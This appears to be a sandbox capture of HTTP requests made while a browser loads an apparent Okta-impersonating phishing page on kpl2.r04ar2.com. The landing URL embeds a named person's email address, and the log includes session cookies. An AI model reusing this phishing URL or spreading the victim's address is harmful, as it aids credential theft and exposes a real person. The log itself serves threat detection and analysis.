      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8b9f6497ee820fa4/1724796641795/JJoPtCsZIVs8EyO HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /KPL2/?em=natasha.hammond@lchs.com.au HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.auAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ilg5dHZRdjE0RXpLUlBWc3Z4RmlLZGc9PSIsInZhbHVlIjoiUkNqelFSckNwampGVlJkTHZZa2M4alBPSDEzenJhNUFGZmxQQ3hsRFJDalJ6UmlSL1d0ZkJvdUdlVjJ6U2ltRnBKQ0RRcW9zdTVpSmVSeHlVSHJOMmhONkpRSHI4WXhJRkhMamhqSGtSWWZ5Z01tY205VStIQmN2MWFsSlROekoiLCJtYWMiOiJiYjFjMTMzZDY3MzIwYWJhNGQ2NzlhZDk1Zjg1ODdhNmRmZWQ2MjU0ZWYwYjAyM2NhYThjODk5MjNlZDA5MTI2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InFITXRydUdscmhaaEp2cXhYbEZXNUE9PSIsInZhbHVlIjoiNnJaR2I0Sk5IeEVLWW5aSWFVMGc0TFJ1L1JzWHdraVFxOFIrb1BQOGN6RytQS0lhMk5kNTBkakJKdHJ1bUI2UldoNnFhajJqQk1RVktSWWxhaTJvYSs3WU5GSHNid3dpTjQyZEY4WWhWVXl1WGdYWEpoOHU2UDZ5T25DR1pjeUQiLCJtYWMiOiI0OWRmMTA1NmQ5ZTI4M2ZhZDgwOTZjMjdlZjU4ZDZjMWQxYTI5NDE4ZGE4ZDRiNTQxZmY5M2JkYWYwMzRiMTYyIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /apsDh9aBaVhYjUySTyaOt7dEJs5t HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ilg5dHZRdjE0RXpLUlBWc3Z4RmlLZGc9PSIsInZhbHVlIjoiUkNqelFSckNwampGVlJkTHZZa2M4alBPSDEzenJhNUFGZmxQQ3hsRFJDalJ6UmlSL1d0ZkJvdUdlVjJ6U2ltRnBKQ0RRcW9zdTVpSmVSeHlVSHJOMmhONkpRSHI4WXhJRkhMamhqSGtSWWZ5Z01tY205VStIQmN2MWFsSlROekoiLCJtYWMiOiJiYjFjMTMzZDY3MzIwYWJhNGQ2NzlhZDk1Zjg1ODdhNmRmZWQ2MjU0ZWYwYjAyM2NhYThjODk5MjNlZDA5MTI2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InFITXRydUdscmhaaEp2cXhYbEZXNUE9PSIsInZhbHVlIjoiNnJaR2I0Sk5IeEVLWW5aSWFVMGc0TFJ1L1JzWHdraVFxOFIrb1BQOGN6RytQS0lhMk5kNTBkakJKdHJ1bUI2UldoNnFhajJqQk1RVktSWWxhaTJvYSs3WU5GSHNid3dpTjQyZEY4WWhWVXl1WGdYWEpoOHU2UDZ5T25DR1pjeUQiLCJtYWMiOiI0OWRmMTA1NmQ5ZTI4M2ZhZDgwOTZjMjdlZjU4ZDZjMWQxYTI5NDE4ZGE4ZDRiNTQxZmY5M2JkYWYwMzRiMTYyIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.auAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImVBdVp1aGc1THQzSVd3TlMzMENXZkE9PSIsInZhbHVlIjoia0pRdkVGUlVUdVRSZi9RYjZic29scm1RNFlUUEg2V2FraXRYQ0ppSGhCT0pLSS81QXVIZlN4dENoMHk5dzJqSVdqTjRrSlE3U0Q2cWVTdGw1eUdTc3JXUnB5OTk3TWFMN0RMRTlHem9jR3NvU05FSXFrbHRZaURVUWhlaTJKLzAiLCJtYWMiOiIxZGFhMzc3ZGYxOGI3N2QxOTA5MzNlM2EyYzkzOGNkOWJiOGE2ZmZmNzg3N2U3ZjVhNDFjN2E0ODk1MWMwMjQzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImYrMWdKT1puUkVyRUVNM09uUWJpelE9PSIsInZhbHVlIjoiSWpaSFRkR1lqM2h0b2xIbHllNXRvRkVDMjZSaDRoWDMwd0tSRlFVTFdveitCTHhBR3N3OXhrVDBTNkxqME5NYm5iWjE0dnNUSzlJTnUvUFlMSTA5cFpycEJ4eU03dWFsUTVNdVZTbGZ0ajl2QWt3TUlMeDIwckpUMHk4a2M3VVUiLCJtYWMiOiI4ODI2OTZiOTlhNzk3OTQyYzlhZmMyODY0ZWJkMzgyOTJlMTFmMTNmNDE2NDg2YTRiMmFjMWI2ZTA2YzExZDhiIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /12HMveiyHPabpIUo8913 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /xy7B16Rpqjcafef30 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /rsudZieQRPg934N9fbuv40 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kpl2.r04ar2.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /12Vj5xeItpngol5p78GsRYKIFop50 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kpl2.r04ar2.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /90BLxVXhpRTD45c1Cvst53 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kpl2.r04ar2.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /45lL7KipMN4YrD89WlFkKCVxy70 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kpl2.r04ar2.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T221107Z&X-Amz-Expires=300&X-Amz-Signature=af9a21034bb5e7fe65ef996d782a724b97119aa5e47467ec39a4e165ad0b1acb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /90e3UQoFnPZnefHhdNMQPyz73 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kpl2.r04ar2.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: 